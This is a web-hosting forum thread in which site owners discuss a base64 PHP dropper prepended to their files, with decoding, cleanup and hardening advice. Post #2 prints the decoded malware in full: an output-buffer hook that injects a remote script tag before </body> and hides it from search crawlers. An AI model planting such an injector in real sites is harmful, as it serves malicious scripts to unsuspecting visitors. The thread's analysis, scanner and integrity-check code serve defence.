-
05-07-2010, 06:06 AM #1 Newbie
my site hacked by following php code
some hacker insert the following code to my footer.php
and AVG tell me that threat. Thanks AVG.
Code:
<?php /**/ eval(base64_decode("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"));?>
http://www1.firesavez5.com/?p=p52dcW...iaiglnOdmps%3D
I found that code and deleted it from my file. But I don't know how the hacker inserted it into my php file?
Thanks,
Lei
Last edited by bear; 05-07-2010 at 09:55 AM.
-
05-07-2010, 08:16 AM #2 Web Hosting Master
Hard to say without more background information. It could be due to weak security on a shared hosting server, a compromised server, or a weakness in your web applications.
Just for fun, here's that chunk decoded and cleaned up somewhat.
Code:
if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
    // Guard so the hook is installed only once per request, even if the
    // dropper was prepended to several included files.
    $GLOBALS['mr_no'] = 1;
    if (!function_exists('mrobh')) {
        if (!function_exists('gml')) {
            // Returns the injected script tag, except for Googlebot and Yahoo
            // crawlers, so the injection stays out of search-engine caches.
            function gml() {
                if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                    return '<script src="http://indesignstudioinfo.com/ls.php"></script>';
                }
                return "";
            }
        }
        if (!function_exists('gzdecode')) {
            // Polyfill for hosts whose PHP lacks gzdecode(): walk the gzip header
            // flags (FHCRC=2, FEXTRA=4, FNAME=8, FCOMMENT=16) to find the start of
            // the deflate stream, then inflate it. Needed because the site may
            // already be gzip-compressing its output buffer.
            function gzdecode($var1) {
                $var3 = @ord(@substr($var1, 3, 1));   // FLG byte
                $var2 = 10;                             // fixed header length
                if ($var3 & 4) {                        // FEXTRA
                    $var4 = @unpack('v', substr($var1, 10, 2));
                    $var4 = $var4[1];
                    $var2 += 2 + $var4;
                }
                if ($var3 & 8) {                        // FNAME, NUL-terminated
                    $var2 = @strpos($var1, chr(0), $var2) + 1;
                }
                if ($var3 & 16) {                       // FCOMMENT, NUL-terminated
                    $var2 = @strpos($var1, chr(0), $var2) + 1;
                }
                if ($var3 & 2) {                        // FHCRC
                    $var2 += 2;
                }
                $var5 = @gzinflate(@substr($var1, $var2));
                if ($var5 === FALSE) {
                    $var5 = $var1;                      // not gzip after all; pass through
                }
                return $var5;
            }
        }
        // Output-buffer callback: decompress the page if needed, then insert the
        // script tag just before </body>, or append it when there is no </body>.
        function mrobh($var6) {
            Header('Content-Encoding: none');
            $var7 = gzdecode($var6);
            if (preg_match('/\<\/body/si', $var7)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $var7);
            } else {
                return $var7 . gml();
            }
        }
        ob_start('mrobh');
    }
}
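As an added example (not code from this thread), here is a Python scanner that works the decode above in reverse over a whole web root: it finds the one-line `<?php /**/ eval(base64_decode("..."));?>` dropper the original poster quoted in every .php file, decodes the base64 argument, flags the indicators visible in the cleaned-up decode (the ob_start hook, the gzdecode polyfill, the user-agent check, the injected script tag), and strips the dropper from the file. The sample files, the stand-in payload and the example.invalid URL are constructed for the demo.

```python
"""Find, decode and strip eval(base64_decode(...)) droppers in PHP files."""
import base64
import os
import re
import tempfile

# The dropper shape quoted in post #1: open tag, optional /* */ comment,
# eval(base64_decode("<base64>")); and a close tag, all on one line.
INJECT_RE = re.compile(
    r'<\?php\s*(?:/\*.*?\*/\s*)?eval\(\s*base64_decode\(\s*["\']'
    r'([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;\s*\?>',
    re.DOTALL,
)

# Strings seen in the decoded payload from post #2; any hit marks the
# payload as the output-buffer script injector rather than some other code.
INDICATORS = ("ob_start", "gzdecode", "HTTP_USER_AGENT", "<script src=", "</body")


def decode_payload(b64):
    """Decode the base64 argument, tolerating stripped '=' padding."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("latin-1")


def scan_file(path):
    """Return one dict per dropper found in path: decoded payload and indicator hits."""
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")
    findings = []
    for match in INJECT_RE.finditer(text):
        payload = decode_payload(match.group(1))
        hits = [ind for ind in INDICATORS if ind in payload]
        findings.append({"payload": payload, "indicators": hits})
    return findings


def clean_file(path):
    """Strip every dropper from path in place; return how many were removed."""
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")
    cleaned, count = INJECT_RE.subn("", text)
    if count:
        with open(path, "wb") as fh:
            # The dropper is prepended, so drop the blank line it leaves behind.
            fh.write(cleaned.lstrip("\r\n").encode("latin-1"))
    return count


def scan_tree(root):
    """Walk root and return {path: findings} for every .php file that carries a dropper."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                findings = scan_file(path)
                if findings:
                    found[path] = findings
    return found


def demo():
    """Constructed sample: one infected footer.php and one clean index.php."""
    # Stand-in payload of the same class as the real one (ob_start hook that
    # appends a script tag); the real blob is not reproduced here.
    payload = (
        'if(function_exists("ob_start")){'
        'function mrobh($b){return $b.\'<script src="http://example.invalid/ls.php"></script>\';}'
        'ob_start("mrobh");}'
    )
    b64 = base64.b64encode(payload.encode()).decode()
    root = tempfile.mkdtemp(prefix="webroot-")
    infected = os.path.join(root, "footer.php")
    with open(infected, "w") as fh:
        fh.write('<?php /**/ eval(base64_decode("%s"));?>\n<?php echo "footer"; ?>\n' % b64)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php echo "hello"; ?>\n')

    before = scan_tree(root)
    removed = sum(clean_file(path) for path in before)
    after = scan_tree(root)
    with open(infected) as fh:
        remaining = fh.read()
    return {
        "infected_before": sorted(os.path.basename(p) for p in before),
        "indicators": before[infected][0]["indicators"],
        "removed": removed,
        "infected_after": sorted(os.path.basename(p) for p in after),
        "footer_after": remaining,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Run scan_tree() first and read the decoded payloads before calling clean_file(), since the same pattern is occasionally used by legitimate (if badly written) plugins. The regex only matches this dropper's shape; gzinflate, str_rot13 or variable-function variants need their own patterns. And as post #5 says, stripping the line does nothing about the entry vector.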
-
05-07-2010, 02:08 PM #3 New Member
Lei,
Same thing happened to me today. Every single PHP file on my server had that same line of code entered in it. I'm not sure how it happened or how to prevent it from happening again.
Garret
-
05-07-2010, 03:18 PM #4 Newbie
I'm sure there are several approaches to getting this done. I'm no expert in this, but one of my "clients" had this problem, and each time he removed it, it was back the next day.
It turned out that when I went over his folders and files and set the correct permissions, the problem stopped. For more info have a look at http://en.wikipedia.org/wiki/Chmod
-
05-07-2010, 04:41 PM #5 Web Hosting Guru
chmod only protects files from being modified by whatever method is being used. It isn't actually plugging the security vulnerability that allowed it in the first place. Also, chmod won't help you if your script is vulnerable to injection by itself (and the permissions the script is running under have write access), unless you set the files to read/execute only.
Ideally, shared hosting environments should not allow users to modify other files on the server outside of their root path; if this is not the case, trouble your host to correct it. If they aren't locked out of other users' directories, it will be possible for them to do more than inject a snippet of code into a php script, including obtaining usernames and passwords to your database stored in plaintext configuration files.
-
05-07-2010, 05:40 PM #6 Newbie
Thank you for clearing that up...
-
05-07-2010, 08:28 PM #7 Newbie
The most common method I have seen is the FTP credentials becoming compromised. This can be through brute force, especially with the commonly weak passwords most people use, or just through poor credential management (do you have yours on a sticky note attached to your monitor?). Make sure you approach the host about this issue and have *all* of your credentials changed, including FTP, shell access, control panel, etc. Any method configured for you to access the server should be updated with new credentials. Then go back through your content and remove the scripting.
-
05-08-2010, 12:15 AM #8 Newbie
If you still can't get rid of this problem, please read http://www.wpsecuritylock.com/breaki...-on-dreamhost/
or
http://blog.sucuri.net/2010/05/simpl...or-latest.html
-
05-08-2010, 07:58 AM #9 Web Hosting Master
chmod will only help you if you're on a weakly secured shared hosting server, in the sense that it can stop other people on the server from changing your files. But if your host doesn't work with the files being owned by your own account, other people will still be able to read them, and extract things like database credentials which they can then use to access your database.
It's a jungle out there.
-
05-14-2010, 08:30 AM #10 Junior Guru
The same thing happened to one of my clients: each file of his WordPress installation got that dump inside at the beginning. We found a PHP script that cleans up all files and also removes empty lines:
tutorialsbay.com/wordpress-hacked-malware-redirect/
-
05-14-2010, 02:51 PM #11 Newbie
Possibly a PHP Shell?
-
06-01-2010, 06:57 AM #12 New Member
I think this is weak security of the file manager or picture manager plugins in WYSIWYG editors like TinyMCE.
Here is our case in an old Mambo CMS installation:
lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/
-
06-01-2010, 10:33 AM #13 Disabled
Make sure you ask your host to update your cPanel and PHP/MYSQL. Make sure that you update your PHP scripts as well. A lot of hosts probably don't follow the proper procedures in security as well unfortunately from what I have seen. As always, backup your site every week at least.
-
10-07-2010, 02:29 PM #14 Newbie
The people who create this code and hack it onto people's site are the most despicable of all internet criminals.
I believe I have a simple solution to this problem, at least to stop this scum from hurting your customers.
Their script finds every PHP file and prepends a chunk of PHP.
So use that against them. Include this in every page, as you would the functions of a config file. If it's not in the same directory as your index file, obviously change the code to fit.
Code:
<?php
// This file should be less than 570 characters in length; anything longer
// means something was prepended to it.
$expected = 570;
$data = file_get_contents(__FILE__);
// echo strlen($data);
if (strlen($data) > $expected) {
    // mail('youremail', 'Website compromised ' . $_SERVER['HTTP_HOST'], 'taken offline', 'FROM: youremail');
    // Keep the original index.php under another name the first time this fires.
    if (!file_exists('index.phpx')) {
        rename('index.php', 'index.phpx');
    }
    // Write this despite the existence of index.phpx in case they strike again.
    $fh = fopen('index.php', 'w') or die("can't open file");
    fwrite($fh, 'Sorry, we are currently offline');
    fclose($fh);
}
?>
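The check in post #14 watches the length of one file. A hash manifest of the whole web root catches the same prepend on every file, plus files the intruder adds (the uploads-directory shell in the "Similar Threads" title is the classic case), and it does not depend on the dropper hitting the guard file. The following is an added example in Python, not code from the thread; the sample tree, the manifest location and the simulated infection are all constructed for the demo. The baseline must live outside the web root (and ideally off the server, or at least where the web server's user cannot write), otherwise whoever can rewrite your PHP files can rewrite the manifest too.

```python
"""Hash-manifest integrity check for a web root: baseline, then diff."""
import hashlib
import json
import os
import tempfile


def sha256_file(path):
    """Stream the file through SHA-256 so large uploads do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Return {relative path: sha256} for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def save_manifest(manifest, path):
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, current):
    """Return (modified, added, removed) relative paths, each sorted."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def demo():
    """Constructed scenario: take a baseline, then simulate the infection and diff."""
    root = tempfile.mkdtemp(prefix="webroot-")
    store = tempfile.mkdtemp(prefix="baseline-")   # outside the web root on purpose
    files = {"index.php": "<?php echo 'hi'; ?>\n", "footer.php": "<?php echo 'bye'; ?>\n"}
    for name, body in files.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    manifest_path = os.path.join(store, "manifest.json")
    save_manifest(build_manifest(root), manifest_path)

    # Simulate what the thread describes: a dropper line prepended to an existing
    # file, and a new PHP file dropped under the uploads directory.
    # "ZWNobyAxOw==" is just base64 of "echo 1;", a harmless stand-in payload.
    footer = os.path.join(root, "footer.php")
    with open(footer) as fh:
        original = fh.read()
    with open(footer, "w") as fh:
        fh.write('<?php /**/ eval(base64_decode("ZWNobyAxOw=="));?>' + original)
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(uploads, "x.php"), "w") as fh:
        fh.write("<?php echo 'dropped'; ?>\n")

    return compare(load_manifest(manifest_path), build_manifest(root))


if __name__ == "__main__":
    modified, added, removed = demo()
    print("modified:", modified)
    print("added:", added)
    print("removed:", removed)
```

Take the baseline right after a clean install or a verified clean-up, re-take it after every legitimate upgrade, and run the comparison from cron, mailing yourself anything non-empty. A non-empty "added" list under a directory that should only hold images is the finding that matters most; a modified list covering every .php file at once is the mass prepend this thread is about.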
-
10-07-2010, 03:42 PM #15 Aspiring Evangelist
You can infect every page on a website with a PHP shell if they haven't secured PHP
-
10-07-2010, 03:46 PM #16 Newbie
as long as it also infects this one that's what I'm counting on.
-
10-08-2010, 10:29 AM #17 Junior Guru
chmod is weak: one may put up a PHP file that uses the PHP chmod function, and it might also be changed by FTP.
A better solution is to use "chattr +i", but you need shell access or... a PHP shell (if your hosting provider allows exec(), system(), etc.).
Besides, whoever heard of chattr? No one? So the haxorz wannabes don't know about it either.
www.goscinnawies.pl - family business, small travel agency in Poland
-
10-08-2010, 10:34 AM #18 Web Hosting Evangelist
In response to OP:
This usually occurs because a computer that had FTP/cPanel access to the account picked up some malware which took stored credentials either from Firefox, IT, etc... or from popular FTP software password storage files (such as Filezilla's unencrypted password store) and used that to insert the code.
You should download MBAM (google it) and Avast/AVG/PrevX/etc and run them in full on any machine that has been compromised.
Then (and only then), clean the account and reset the password to something new.
-
10-08-2010, 10:56 AM #19 Web Hosting Evangelist
The following link explains it.
http://forums.oscommerce.com/topic/3...-64-infection/